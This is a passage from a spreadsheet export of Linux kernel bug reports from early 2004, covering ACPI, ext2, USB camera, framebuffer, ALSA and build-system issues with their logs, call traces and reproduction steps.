    <t>Below test cases shows that current ACPI CA has bug in passing argument by reference. Name (SXX0, Buffer (0x0100) {}) Method (SXX5, 2, NotSerialized) { Store ("sizeof arg0", Debug) Store (SizeOf (Arg0), Debug) Store ("arg1 = ", Debug) Store (Arg1, Debug) If (LLess (Arg1, SizeOf (Arg0))) { CreateByteField (Arg0, Arg1, SX20) Store(6, SX20) Store("SX20", Debug) Store(SX20, Debug) } } Method (_STA, 0, NotSerialized) { Name (SX24, Buffer (0x07) {}) Store ("1111111", Debug) Store (Zero, Local0) Store (0x06, SXX2) CreateByteField (SXX0, 0, SX80) Store ("SXX5", Debug) SXX5 (SXX0, Local0) Store ("SX80", Debug) Store (SX80, Debug) [ACPI Debug] String: 1111111 [ACPI Debug] String: SXX5 [ACPI Debug] String: sizeof arg0 [ACPI Debug] Integer: 0000000000000100 [ACPI Debug] String: arg1 = [ACPI Debug] Integer: 0000000000000000 [ACPI Debug] String: SX20 [ACPI Debug] Integer: 0000000000000006 [ACPI Debug] String: SX80 [ACPI Debug] Integer: 0000000000000000 Name (SXX0, Buffer (0x0100) {}) Method (SXX5, 2, NotSerialized) { Store ("sizeof arg0", Debug) Store (SizeOf (Derefof(Arg0)), Debug) Store ("arg1 = ", Debug) Store (Arg1, Debug) If (LLess (Arg1, SizeOf (Derefof(Arg0)))) { CreateByteField (Derefof(Arg0), Arg1, SX20) Store(6, SX20) Store("SX20", Debug) Store(SX20, Debug) } } Method (_STA, 0, NotSerialized) { Name (SX24, Buffer (0x07) {}) Store ("1111111", Debug) Store (Zero, Local0) Store (0x06, SXX2) CreateByteField (SXX0, 0, SX80) Store ("SXX5", Debug) SXX5 (Refof(SXX0), Local0) Store ("SX80", Debug) Store (SX80, Debug) [ACPI Debug] String: 1111111 [ACPI Debug] String: SXX5 [ACPI Debug] String: sizeof arg0 [ACPI Debug] Integer: 0000000000000100 [ACPI Debug] String: arg1 = [ACPI Debug] Integer: 0000000000000000 [ACPI Debug] String: SX20 [ACPI Debug] Integer: 0000000000000006 [ACPI Debug] String: SX80 [ACPI Debug] Integer: 0000000000000006</t>
  </si>
  <si>
    <t>Missing declaration and compiling error when ext2fs_debug is set</t>
  </si>
  <si>
    <t>2004-01-01 07:08 UTC</t>
  </si>
  <si>
    <t>Quentin Tayssier</t>
  </si>
  <si>
    <t>2004-01-21 17:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: I386 Software Environment: gcc (GCC) 3.3.3 20031229 Problem Description: CC [M] fs/ext2/balloc.o fs/ext2/balloc.c: In function `ext2_count_free_blocks': fs/ext2/balloc.c:532: error: `es' undeclared (first use in this function) fs/ext2/balloc.c:532: error: (Each undeclared identifier is reported only once fs/ext2/balloc.c:532: error: for each function it appears in.) make[2]: *** [fs/ext2/balloc.o] Error 1 make[1]: *** [fs/ext2] Error 2 make: *** [fs] Error 2 Steps to reproduce: In include/linux/ext2_fs.h line 29 replace #undef EXT2FS_DEBUG by #define EXT2FS_DEBUG</t>
  </si>
  <si>
    <t>2.6.1-rc1</t>
  </si>
  <si>
    <t>Leandro Piccilli</t>
  </si>
  <si>
    <t>usb timeout when connecting digital camera</t>
  </si>
  <si>
    <t>2004-01-02 07:49 UTC</t>
  </si>
  <si>
    <t>2004-01-09 15:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: PC VIA KT400 (usb 1.1/2.0) Software Environment: Kernel 2.6.1-rc1 (and previous) Problem Description: Cannot retrieve pictures using gphoto2 (works in 2.4 flavours doing the same commands). Now unless this is a specific bug in the way gphoto2 handles the usb protocol, i expect it to work the same under both 2.4/2.6 Here's a dump : ehci_hcd 0000:00:10.3: GetStatus port 1 status 003802 POWER OWNER sig=j CSC hub 1-0:1.0: port 1, status 0, change 1, 12 Mb/s ehci_hcd 0000:00:10.3: GetStatus port 6 status 001803 POWER sig=j CSC CONNECT hub 1-0:1.0: port 6, status 501, change 1, 480 Mb/s hub 1-0:1.0: debounce: port 6: delay 100ms stable 4 status 0x501 ehci_hcd 0000:00:10.3: port 6 full speed --&gt; companion ehci_hcd 0000:00:10.3: GetStatus port 6 status 003801 POWER OWNER sig=j CONNECT drivers/usb/host/uhci-hcd.c: 9800: wakeup_hc hub 4-0:1.0: port 2, status 101, change 1, 12 Mb/s hub 4-0:1.0: debounce: port 2: delay 100ms stable 4 status 0x101 hub 4-0:1.0: new USB device on port 2, assigned address 2 usb 4-2: new device strings: Mfr=1, Product=2, SerialNumber=0 drivers/usb/core/message.c: USB device number 2 default language ID 0x409 usb 4-2: Product: PowerShot S40 usb 4-2: Manufacturer: Canon Inc. drivers/usb/core/usb.c: usb_hotplug usb 4-2: registering 4-2:1.0 (config #1, interface 0) drivers/usb/core/usb.c: usb_hotplug usb 4-2: usb_disable_device nuking non-ep0 URBs usb 4-2: unregistering interface 4-2:1.0 drivers/usb/core/usb.c: usb_hotplug usb 4-2: registering 4-2:1.0 (config #1, interface 0) drivers/usb/core/usb.c: usb_hotplug usb 4-2: control timeout on ep0in usbfs: USBDEVFS_CONTROL failed cmd usbmodules dev 2 rqt 128 rq 6 len 39 ret -110 [snip] This last line get duplicated over 20 times in my logs then i get : usb 4-2: control timeout on ep0out usbfs: USBDEVFS_CONTROL failed cmd gphoto2 dev 2 rqt 64 rq 4 len 80 ret -110 Debug: sleeping function called from invalid context at mm/slab.c:1856 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c01186db&gt;] __might_sleep+0xab/0xd0 [&lt;c013b389&gt;] __kmalloc+0x89/0x90 [&lt;e0cdd59c&gt;] os_alloc_mem+0x7c/0x90 [nvidia] [&lt;e0b72a20&gt;] _nv001308rm+0x10/0x28 [nvidia] [&lt;e0c8b1bd&gt;] _nv001518rm+0x7c9/0xb34 [nvidia] [&lt;e0c0f991&gt;] _nv002465rm+0x81/0x420 [nvidia] [&lt;e0c0f9a8&gt;] _nv002465rm+0x98/0x420 [nvidia] [&lt;e0b68595&gt;] _nv001338rm+0x1d/0x24 [nvidia] [&lt;e0b59185&gt;] _nv005601rm+0xd/0x34 [nvidia] [&lt;e0b60868&gt;] _nv000858rm+0x300/0xe14 [nvidia] [&lt;e0b5b810&gt;] _nv005608rm+0xac/0x124 [nvidia] [&lt;e0cdd59c&gt;] os_alloc_mem+0x7c/0x90 [nvidia] [&lt;e0b72849&gt;] _nv001247rm+0x15/0x1c [nvidia] [&lt;e0b5cb1d&gt;] _nv002962rm+0x2c5/0x3b8 [nvidia] [&lt;e0b774d9&gt;] _nv000899rm+0x4c9/0xf70 [nvidia] [&lt;e0b774ec&gt;] _nv000899rm+0x4dc/0xf70 [nvidia] [&lt;c02884fd&gt;] ide_build_sglist+0x3d/0xb0 [&lt;c0208644&gt;] __delay+0x14/0x20 [&lt;c0288df6&gt;] __ide_dma_begin+0x36/0x50 [&lt;c0288fa5&gt;] __ide_dma_count+0x15/0x20 [&lt;c0288ce9&gt;] __ide_dma_read+0xc9/0xd0 [&lt;c0288410&gt;] ide_dma_intr+0x0/0xb0 [&lt;c0288940&gt;] dma_timer_expiry+0x0/0x90 [&lt;c027e5d0&gt;] do_rw_taskfile+0x1c0/0x2c0 [&lt;c01554da&gt;] bio_hw_segments+0x2a/0x30 [&lt;c0285043&gt;] lba_28_rw_disk+0xa3/0xb0 [&lt;c027e1a0&gt;] SELECT_DRIVE+0x30/0x50 [&lt;c01079c8&gt;] __switch_to+0x128/0x1a0 [&lt;c0116fa4&gt;] schedule+0x334/0x590 [&lt;c0136910&gt;] mempool_alloc+0x80/0x170 [&lt;c0118ab0&gt;] autoremove_wake_function+0x0/0x50 [&lt;c02f20bc&gt;] dev_queue_xmit+0x21c/0x2b0 [&lt;e0cd3d5f&gt;] _nv000176rm+0x57/0x3ec [nvidia] [&lt;e0cd3d5f&gt;] _nv000176rm+0x57/0x3ec [nvidia] [&lt;e0cd3d5f&gt;] _nv000176rm+0x57/0x3ec [nvidia] [&lt;e0b68595&gt;] _nv001338rm+0x1d/0x24 [nvidia] [&lt;e0b8dadc&gt;] _nv005307rm+0x54/0x544 [nvidia] [&lt;e0c3e2cb&gt;] _nv001532rm+0x1f/0x28 [nvidia] [&lt;e0c3e27c&gt;] _nv001534rm+0x20/0x28 [nvidia] [&lt;e0b68595&gt;] _nv001338rm+0x1d/0x24 [nvidia] [&lt;e0b6840a&gt;] _nv001344rm+0x22/0x6c [nvidia] [&lt;e0b6840a&gt;] _nv001344rm+0x22/0x6c [nvidia] [&lt;e0b6840a&gt;] _nv001344rm+0x22/0x6c [nvidia] [&lt;e0c3e40b&gt;] _nv001556rm+0x5b/0x6c [nvidia] [&lt;e0b6840a&gt;] _nv001344rm+0x22/0x6c [nvidia] [&lt;c0266df8&gt;] get_device+0x18/0x30 [&lt;e0947ea4&gt;] uhci_submit_common+0x214/0x2e0 [uhci_hcd] [&lt;c02ed898&gt;] alloc_skb+0x48/0xf0 [&lt;c0116210&gt;] recalc_task_prio+0x90/0x1a0 [&lt;c02edb0b&gt;] __kfree_skb+0x6b/0xe0 [&lt;c01100e3&gt;] convert_fxsr_to_user+0xc3/0x160 [&lt;e0c3e27c&gt;] _nv001534rm+0x20/0x28 [nvidia] [&lt;c0110347&gt;] save_i387_fxsave+0xd7/0x110 [&lt;c0108a13&gt;] setup_sigcontext+0xe3/0x130 [&lt;c0108b6f&gt;] setup_frame+0x10f/0x200 [&lt;e0b76be1&gt;] rm_ioctl+0x19/0x20 [nvidia] [&lt;e0cdb58c&gt;] nv_kern_ioctl+0x7c/0x490 [nvidia] [&lt;c01101a5&gt;] convert_fxsr_from_user+0x25/0xf0 [&lt;c0122f86&gt;] update_process_times+0x46/0x50 [&lt;c0122dfd&gt;] update_wall_time+0xd/0x40 [&lt;c0123260&gt;] do_timer+0xe0/0xf0 [&lt;c0444635&gt;] acpi_system_init+0x9d/0x134 [&lt;c0161a94&gt;] sys_ioctl+0xf4/0x290 [&lt;c0444635&gt;] acpi_system_init+0x9d/0x134 [&lt;c010933b&gt;] syscall_call+0x7/0xb [&lt;c0444635&gt;] acpi_system_init+0x9d/0x134 lsusb says : lsusb Bus 004 Device 003: ID 04a9:3056 Canon, Inc. PowerShot S40 Bus 004 Device 001: ID 0000:0000 Bus 003 Device 001: ID 0000:0000 Bus 002 Device 004: ID 046d:c501 Logitech, Inc. Cordless Mouse Receiver Bus 002 Device 003: ID 413c:2002 Dell Computer Corp. Bus 002 Device 002: ID 413c:1002 Dell Computer Corp. Bus 002 Device 001: ID 0000:0000 Bus 001 Device 001: ID 0000:0000 a debug of gphoto2 tells us it finds it : 3.819117 gphoto2-port(2): Opening USB port... 3.819179 canon/library.c(2): canon camera_init() 3.819214 canon/library.c(2): GPhoto tells us that we should use a USB link. 3.819226 canon/usb.c(2): Initializing the (USB) camera. 3.819246 gphoto2-port(2): Setting settings... 3.876677 gphoto2-port-usb(2): Changed usb.config from -1 to 1 3.897409 gphoto2-port-usb(2): Changed usb.altsetting from -1 to 0 3.897508 canon/usb.c(2): canon_usb_camera_init() 3.897538 canon/usb.c(2): canon_usb_identify: model name match 'Canon:PowerShot S40' 3.897565 context(2): Detected a 'Canon:PowerShot S40'. Detected a 'Canon:PowerShot S40'. 3.897584 gphoto2-port(2): Reading message (request=0xc value=0x55 index=0x0 size=1=0x1)... 3.906746 gphoto2-port(3): Hexdump of 1 = 0x1 bytes follows: Steps to reproduce: 1. Compile a 2.6 kernel 2. Boot up and start hotplug 3. Connect camera 4. Use the command : gphoto2 --get-all-files 5. Watch it die.</t>
  </si>
  <si>
    <t>Pedro C</t>
  </si>
  <si>
    <t>atyfb does not recognise the Rage Mobility-M controller</t>
  </si>
  <si>
    <t>2004-01-03 16:28 UTC</t>
  </si>
  <si>
    <t>Jean-Philippe Gu</t>
  </si>
  <si>
    <t>2006-04-22 07:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Fujitsu Lifebook P2020 laptop Software Environment: Framebuffer Problem Description: The atyfb driver does not recognise the Rage Mobility-M controller of this laptop. lspci -n gives : 00:14.0 Class 0300: 1002:4c52 (rev 64) lspci -v -v -v gives me : 00:14.0 VGA compatible controller: ATI Technologies Inc Rage Mobility P/M (rev 64) (prog-if 00 [VGA]) Subsystem: Fujitsu Limited.: Unknown device 10c9 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 66 (2000ns min), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 9 Region 0: Memory at fd000000 (32-bit, non-prefetchable) [size=16M] Region 1: I/O ports at 1400 [size=256] Region 2: Memory at fc006000 (32-bit, non-prefetchable) [size=4K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [5c] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Steps to reproduce:</t>
  </si>
  <si>
    <t>tridentfb doesn't talk about wrong modes</t>
  </si>
  <si>
    <t>2004-01-04 03:24 UTC</t>
  </si>
  <si>
    <t>2005-03-07 11:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/stable Hardware Environment: Mini-ITX with onboard graphic Problem Description: When booting with different kernel parameters, tridentfb used to use 640x480 silently. It never told me about not knowing my given mode. I later enabled debug in modedb.c, so I got the hint what went wrong. Here is a log that didn't help at all: Jan 4 08:28:12 echidna kernel: tridentfb: Trident framebuffer 0.7.8-NEWAPI initializing Jan 4 08:28:12 echidna kernel: tridentfb: framebuffer size = 8192 Kb Jan 4 08:28:12 echidna kernel: tridentfb: 0000:01:00.0 board found Jan 4 08:28:12 echidna kernel: tridentfb: fb0: Trident frame buffer device 640x480-8bpp Here is a boot log that helped: Jan 4 11:37:46 echidna kernel: fb_find_mode: Trying specified video mode Jan 4 11:37:46 echidna kernel: __fb_try_mode: Trying mode noname 1280x1024-16@61 Jan 4 11:37:46 echidna kernel: tridentfb: fb0: Trident frame buffer device 1280x1024-16bpp What is now disturbing me is that tridentfb says: Jan 4 12:06:31 echidna kernel: tridentfb: Trident framebuffer 0.7.8-NEWAPI initializing Jan 4 12:06:31 echidna kernel: tridentfb: framebuffer size = 8192 Kb Jan 4 12:06:31 echidna kernel: tridentfb: 0000:01:00.0 board found Jan 4 12:06:31 echidna kernel: fb_find_mode: Trying specified video mode Jan 4 12:06:31 echidna kernel: __fb_try_mode: Trying mode noname 1280x1024-24@61 Jan 4 12:06:31 echidna kernel: tridentfb: fb0: Trident frame buffer device 1280x1024-32bpp Why does is switch to 32 bit? And the right half of the screen repeates about one centimeter, looks like repeated memory to me. And the screen has some snow when drawing is active (possible hardware bug?).</t>
  </si>
  <si>
    <t>Computer does not switch off after "Power down" message</t>
  </si>
  <si>
    <t>2004-01-04 04:18 UTC</t>
  </si>
  <si>
    <t>Thibault G.</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: Dell Dimension XP 233 (Pentium II 233) Software Environment: Problem Description: When I run "halt", the computer follows the standard shutdown procedure, and print a final "Power down". But then, it does not switch off : the screen and the box stay on. I even have to push the power button for several second to force the switch-off. It is not the case with kernel 2.4.22 (with that kernel the computer switches off normally after the "power down" message). I tried to force the use of acpi, but my bios seems not to be compliant with ACPI. I also tried to pass apm the kernel boot param "on", "power-off", "realmode-power-off", but it doesn't change anything. With apm=debug, I get this in /var/log/dmesg (it may help) : apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) apm: entry f000:4c8c cseg16 f000 dseg 40 cseg len ffff, dseg len ffff cseg16 le\ n ffff ikconfig 0.7 with /proc/config* apm: Connection version 1.2 apm: AC on line, battery status unknown, battery life unknown apm: battery flag 0x80, battery life unknown Steps to reproduce: Run "halt".</t>
  </si>
  <si>
    <t>Kernel hangs with alsa sound on an acer laptop w/ali m1533</t>
  </si>
  <si>
    <t>2.6.1-rc1, 2.6.1-rc1-mm1, 2.4.24-pre3</t>
  </si>
  <si>
    <t>2004-01-04 17:23 UTC</t>
  </si>
  <si>
    <t>Risto Sandvik</t>
  </si>
  <si>
    <t>2004-02-04 08:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Acer Extensa 503T laptop, ALi chipset, opl3SAx sound Problem Description: Everything freezes when trying to play sounds using the alsa driver opl3sa2 (kernel supplied or 1.0.0rc2) on an Acer Extensa series laptop with the Ali M1533 PCI to ISA bridge. Problem exists both in the 2.6 and 2.4 series of kernels. Adding AL_M1533 to drivers/pci/quirks.c fixes the problem for both. This has been a known problem since 2.2.x (see http://www.mfn.unipmn.it/~sitta/linux503.html) Steps to reproduce:(as root) modprobe snd-opl3sa2 (as regular user or root) mpg321 my_favorite_song.mp3</t>
  </si>
  <si>
    <t>help system points to wrong directory:  Documentation/swsusp.txt</t>
  </si>
  <si>
    <t>2004-01-05 03:25 UTC</t>
  </si>
  <si>
    <t>Wilfried Goesgens</t>
  </si>
  <si>
    <t>2004-04-15 18:31 UTC</t>
  </si>
  <si>
    <t>if you do &lt;help&gt; in make menuconfig on SWSUSP, it tells you to find more information at Documentation/swsusp.txt, but the file is actually located at Documentation/power/swsusp.txt</t>
  </si>
  <si>
    <t>Patch for Makefile.lib bug when using separate object tree</t>
  </si>
  <si>
    <t>2004-01-05 09:20 UTC</t>
  </si>
  <si>
    <t>2005-09-10 06:15 UTC</t>
  </si>
  <si>
    <t>A comment in scripts/Makefile.lib says: "If building the kernel in a separate objtree expand all occurrences of -Idir to -Idir -I$(srctree)/dir. hereby allowing gcc to locate files in both trees. Local tree first." However, the pattern a few lines below changes -Idir to just -I$(srctree)/dir instead of -Idir -I$(srctree)/dir. That recently caused me some grief when trying to compile an external module. --- a/scripts/Makefile.lib 2003-12-17 21:58:49.000000000 -0500 +++ b/scripts/Makefile.lib 2004-01-05 11:36:48.989531860 -0500 @@ -154,7 +154,7 @@ __hostcxx_flags = $(_hostcxx_flags) else flags = $(foreach o,$($(1)),\ - $(if $(filter -I%,$(o)),$(patsubst -I%,-I$(srctree)/%,$(o)),$(o))) + $(if $(filter -I%,$(o)),$(o) $(patsubst -I%,-I$(srctree)/%,$(o)),$(o))) # -I$(obj) locate generated .h files # -I$(srctree)/$(src) locate .h files in srctree, from generated .c files</t>
  </si>
  <si>
    <t>Problem with nanosleep() and ALSA</t>
  </si>
  <si>
    <t>2.6.1rc1-mm2</t>
  </si>
  <si>
    <t>2004-01-05 20:40 UTC</t>
  </si>
  <si>
    <t>Eddahbi Karim</t>
  </si>
  <si>
    <t>2004-12-22 09:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: AMD Athlon XP 1800+, Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller. Software Environment: XMMS, Alsa 0.9.8, Drivers build into the kernel. Problem Description: XMMS keeps looping 1 second of the current sound when I try to load another one via the "Next" button or when I double click on another sound in the playlist. With gdb, I saw that xmms was stuck on the nanosleep() function. Steps to reproduce: When editing my grub.conf, I did a typo and write cbq whereas cfq. Then I start my system (X11, Xfce4, Nvidia drivers) and I launched XMMS. At this moment, I could reproduce the bug. Then I modified my grub.conf and set the elevator to CFQ this time and the XMMS bug disappeared. Linux needs a way to detect a wrong evelator option...</t>
  </si>
  <si>
    <t>2006-09-28 13:16 UTC</t>
  </si>
  <si>
    <t>Error during compile 2.6.1-rc2-mm1</t>
  </si>
  <si>
    <t>2.6.1-rc2-mm1</t>
  </si>
  <si>
    <t>2004-01-08 05:51 UTC</t>
  </si>
  <si>
    <t>2004-03-15 06:11 UTC</t>
  </si>
  <si>
    <t>drivers_video-dri</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Duron 1ghz, 368 ram, mobo pc-ships m810 Problem Description: Error in compile CC drivers/char/drm/sis_ds.o CC drivers/char/drm/sis_mm.o drivers/char/drm/sis_mm.c:37:25: linux/sisfb.h: Arquivo ou diret</t>
  </si>
  <si>
    <t>Karoly Vegh</t>
  </si>
  <si>
    <t>platform_sparc64</t>
  </si>
  <si>
    <t>usb-storage borks out with my camera</t>
  </si>
  <si>
    <t>2004-01-09 09:01 UTC</t>
  </si>
  <si>
    <t>2004-03-13 03:20 UTC</t>
  </si>
  <si>
    <t>I get this, while plugin my FinePix2400Zom camera to me USB port (it does work with the 2.4 kernel series): Initializing USB Mass Storage driver... scsi0 : SCSI emulation for USB Mass Storage devices Vendor: Fujifilm Model: FinePix 1400Zoom Rev: 1000 Type: Direct-Access ANSI SCSI revision: 02 sda : READ CAPACITY failed. sda : status=0, message=00, host=7, driver=00 sda : sense not available. sda: assuming Write Enabled sda: assuming drive cache: write through sda : READ CAPACITY failed. sda : status=0, message=00, host=7, driver=00 sda : sense not available. sda: assuming Write Enabled sda: assuming drive cache: write through sda : READ CAPACITY failed. sda : status=0, message=00, host=7, driver=00 sda : sense not available. sda: assuming Write Enabled sda: assuming drive cache: write through /dev/scsi/host0/bus0/target0/lun0:&lt;3&gt;Buffer I/O error on device sda, logical block 0 Buffer I/O error on device sda, logical block 0 unable to read partition table /dev/scsi/host0/bus0/target0/lun0:&lt;3&gt;Buffer I/O error on device sda, logical block 0 unable to read partition table Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0, type 0 WARNING: USB Mass Storage data integrity not assured USB Mass Storage device found at 3 drivers/usb/core/usb.c: registered new driver usb-storage USB Mass Storage support registered. usbfs: USBDEVFS_CONTROL failed cmd usbmodules dev 3 rqt 128 rq 6 len 18 ret -110 ^^^^^^^^^ lots of those like this last line.</t>
  </si>
  <si>
    <t>Wrong keycodes on a SUN Type 6 USB keyboard</t>
  </si>
  <si>
    <t>2004-01-09 11:30 UTC</t>
  </si>
  <si>
    <t>Willie Sippel</t>
  </si>
  <si>
    <t>2004-01-23 15:30 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: AMD Opteron 140, 1GB RAM Software Environment: Kernel 2.6.1-gentoo, compiled for x86_64 Problem Description: Switching from 2.6.0 to 2.6.1, the '#' key (german keyboard layout) stopped working on my SUN Type 6 USB keyboard. I checked using xev, the key now seems to send the 'print' keycode (111, instead of 51). 2.6.0 worked perfectly. This problem exists since 2.6.1-rc1, and only appears using X. Steps to reproduce: always</t>
  </si>
  <si>
    <t>ide-tape sleeping in invalid context</t>
  </si>
  <si>
    <t>2004-01-10 14:29 UTC</t>
  </si>
  <si>
    <t>2004-04-24 13:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Seagate STT2000A + SiS 5513 Software Environment: Problem Description: The IDE-TAPE driver is sleeping in invalid contexts: Debug: sleeping function called from invalid context at kernel/sched.c:1748 in_atomic():0, irqs_disabled():1 Call Trace: [&lt;c01193d2&gt;] __might_sleep+0xab/0xc9 [&lt;c0118324&gt;] wait_for_completion+0x1f/0xde [&lt;c0108aa8&gt;] handle_signal+0xbc/0x122 [&lt;c0108bbf&gt;] do_signal+0xb1/0x100 [&lt;c022a332&gt;] idetape_wait_for_request+0x7a/0x92 [&lt;c022b512&gt;] idetape_add_chrdev_write_request+0xa6/0x1ee [&lt;c022d4ed&gt;] idetape_chrdev_write+0x25c/0x42d [&lt;c022d291&gt;] idetape_chrdev_write+0x0/0x42d [&lt;c014d1cd&gt;] vfs_write+0xb0/0x119 [&lt;c0126d33&gt;] sys_rt_sigprocmask+0xd2/0x192 [&lt;c014d2db&gt;] sys_write+0x42/0x63 [&lt;c0108dd7&gt;] syscall_call+0x7/0xb Debug: sleeping function called from invalid context at kernel/sched.c:1748 in_atomic():0, irqs_disabled():1 Call Trace: [&lt;c01193d2&gt;] __might_sleep+0xab/0xc9 [&lt;c0118324&gt;] wait_for_completion+0x1f/0xde [&lt;c01180df&gt;] default_wake_function+0x0/0x12 [&lt;c01180df&gt;] default_wake_function+0x0/0x12 [&lt;c0229cd9&gt;] __idetape_kmalloc_stage+0x123/0x1f3 [&lt;c022a332&gt;] idetape_wait_for_request+0x7a/0x92 [&lt;c022b6d6&gt;] idetape_wait_for_pipeline+0x7c/0x8b [&lt;c022b7f3&gt;] idetape_empty_write_pipeline+0x10e/0x1f3 [&lt;c022e9f5&gt;] idetape_write_release+0x22/0xc1 [&lt;c02c2396&gt;] __kfree_skb+0x82/0xfa [&lt;c022ebfd&gt;] idetape_chrdev_release+0x169/0x174 [&lt;c01ce5a0&gt;] pty_write+0x1ec/0x1ee [&lt;c01ca669&gt;] tty_default_put_char+0x33/0x37 [&lt;c01cb05d&gt;] opost+0x8d/0x19f [&lt;c013fb2c&gt;] do_wp_page+0x1af/0x3eb [&lt;c01cccae&gt;] write_chan+0x156/0x219 [&lt;c01180df&gt;] default_wake_function+0x0/0x12 [&lt;c01180df&gt;] default_wake_function+0x0/0x12 [&lt;c01c7e01&gt;] tty_write+0x19e/0x2a8 [&lt;c01ccb58&gt;] write_chan+0x0/0x219 [&lt;c01c7c63&gt;] tty_write+0x0/0x2a8 [&lt;c014e06b&gt;] __fput+0x102/0x114 [&lt;c014c7bf&gt;] filp_close+0x59/0x86 [&lt;c014c84f&gt;] sys_close+0x63/0x96 [&lt;c0108dd7&gt;] syscall_call+0x7/0xb and there are more call paths which cause the problem. Steps to reproduce: dump a filesystem to tape.</t>
  </si>
  <si>
    <t>Complete Freeze when using jpilot to sync with a visor (palm os) by USB</t>
  </si>
  <si>
    <t>2004-01-10 16:03 UTC</t>
  </si>
  <si>
    <t>PRIOUR Gaetan</t>
  </si>
  <si>
    <t>2004-01-10 18:17 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Pentium 1Gz, 256Mb RAM, 20G HDD, Sony Vaio Laptop Software Environment: Debian Sid, jpilot Problem Description: When using jpilot (www.jpilot.org) to sync with my visor (usb connection), it sometimes (like 1 time on 30 ) freeze, complete freeze, the mouse is not moving, i can't close the session, i can't go to another console ( CTRL ALT F1 ), i can't reset, i have to unplugged the computer. I have the module 'visor' as well as 'usbserial' loaded. /var/log/kern.log doesn't show that the device is unregistered : Jan 10 23:37:00 vaio kernel: hub 1-0:1.0: new USB device on port 1, assigned address 20 Jan 10 23:37:00 vaio kernel: usb 1-1: Handspring Visor / Palm OS: Number of ports: 2 Jan 10 23:37:00 vaio kernel: usb 1-1: Handspring Visor / Palm OS: port 1, is for Generic use Jan 10 23:37:00 vaio kernel: usb 1-1: Handspring Visor / Palm OS: port 2, is for HotSync use Jan 10 23:37:00 vaio kernel: visor 1-1:1.0: Handspring Visor / Palm OS converter detected Jan 10 23:37:00 vaio kernel: usb 1-1: Handspring Visor / Palm OS converter now attached to ttyUSB0 (or usb/tts/0 for devfs) Jan 10 23:37:00 vaio kernel: usb 1-1: Handspring Visor / Palm OS converter now attached to ttyUSB1 (or usb/tts/1 for devfs) Jan 10 23:38:41 vaio kernel: klogd 1.4.1#13, log source = /proc/kmsg started. vaio:/home/gaga# lspci | grep USB 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 01) 00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 01) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 01) my usb host controller is 'uhci' That's all i can't think about, if you need more details about the hardware, please contact me. Steps to reproduce (doesn't happen all the time) : run 'jpilot' sync the visor plugged by USB connection</t>
  </si>
  <si>
    <t>kernel hangs on detection of controler</t>
  </si>
  <si>
    <t>2.6.1 linus tree</t>
  </si>
  <si>
    <t>2004-01-11 20:40 UTC</t>
  </si>
  <si>
    <t>cynyr</t>
  </si>
  <si>
    <t>2004-03-11 04:51 UTC</t>
  </si>
  <si>
    <t>Distribution:gentoo Hardware Environment:x86 Software Environment: Linux flying-penguin 2.6.0-test8-3 #3 SMP Wed Oct 29 21:55:51 EST 2003 i686 Transmeta(tm) Crusoe(tm) Processor TM5800 GenuineTMx86 GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.15-pre4 e2fsprogs 1.34 xfsprogs 2.3.9 pcmcia-cs 3.2.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.12 Net-tools 1.60 Kbd 1.06 Sh-utils 5.0 Modules Loaded sg sd_mod 8139too apm ds pcmcia_core usblp ohci_hcd prism2_pci p80211 ide_scsi snd_ali5451 msr cpuid longrun sr_mod Problem Description:when the kernel either comes to the detection of the iee1394 controler, or the module trys to detect the controler, it hangs.... Steps to reproduce: compile the linus tree kernel with ieee1394 as a yes and then reboot and have it detect the controler</t>
  </si>
  <si>
    <t>When matrox accelerated framebuffer is loaded, the console becomes unreadable</t>
  </si>
  <si>
    <t>2004-01-12 07:30 UTC</t>
  </si>
  <si>
    <t>Michal Suchanek</t>
  </si>
  <si>
    <t>2005-08-15 17:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: PIII in slot board, VIA chipset, Matrox g550, TFT panel using DVI connection Software Environment: gcc 3.3.2 (Debian) Problem Description: When matrox framebuffer modules are loaded the screen shows only red pattern that changes somewhat when switching virtual consoles. No noticable changes while writing. When X server is started it works fine and uses the framebuffer driver to swith resolution. Steps to reproduce: Compile a kernel with all support for framebuffer on Matrox cards as modules, load i2c-matroxfb.</t>
  </si>
  <si>
    <t>LID switch event storm after swsuspend</t>
  </si>
  <si>
    <t>2.4 + 2.6</t>
  </si>
  <si>
    <t>2004-01-12 07:32 UTC</t>
  </si>
  <si>
    <t>Sebastian Kugler</t>
  </si>
  <si>
